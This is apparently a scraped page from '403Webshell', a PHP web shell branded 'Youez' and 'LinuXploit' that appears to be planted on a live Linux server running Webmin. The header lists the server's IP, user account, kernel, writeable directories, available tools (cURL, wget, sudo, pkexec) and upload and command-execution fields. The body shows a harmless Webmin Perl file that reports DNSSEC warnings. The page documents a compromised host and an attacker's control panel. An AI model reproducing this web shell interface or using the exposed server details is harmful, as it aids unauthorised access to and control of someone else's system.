403Webshell
Server IP : 167.99.254.82  /  Your IP : 216.73.216.76
Web Server : Apache
System : Linux host.techisquad.com 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : pawluxera ( 1011)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/webmin/bind8/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/webmin/bind8/system_info.pl
use strict;
use warnings;

do 'bind8-lib.pl';    ## no critic
our (%text, %config, %access, $module_name);

sub list_system_info
{
my ($data, $in) = @_;
my @rv;
if (&foreign_available($module_name) && $access{'defaults'} &&
    $config{'dnssec_info'}) {
	# Show DNSSEC client config errors
	my $err = &check_dnssec_client();
	if ($err) {
		push(@rv, { 'type' => 'warning',
			    'level' => 'warn',
			    'warning' => $err });
		}
	}
if (&foreign_available($module_name) && !$access{'noconfig'} &&
    $config{'dnssec_info'}) {
	# Show DNSSEC expired domains
	my @exps = &list_dnssec_expired_domains();
	if (@exps) {
		my @doms = map { $_->{'name'}." (".&make_date($_->{'expiry'}, 1).")" } @exps;
		my $msg = &text('index_eexpired', join(", ", @doms))."<p>\n";
		my $job = &get_dnssec_cron_job();
		if (!$job) {
			$msg .= &text('index_eexpired_conf',
				      &ui_link(&get_webprefix()."/$module_name/conf_dnssec.cgi",
					       $text{'dnssec_title'}));
			}
		else {
			$msg .= &text('index_eexpired_mod',
				      &ui_link(&get_webprefix()."/$module_name/",
					       $text{'index_title'}));
			}
		push(@rv, { 'type' => 'warning',
			    'level' => 'danger',
			    'warning' => $msg });
		}
	}
return @rv;
}

Youez - 2016 - github.com/yon3zu
LinuXploit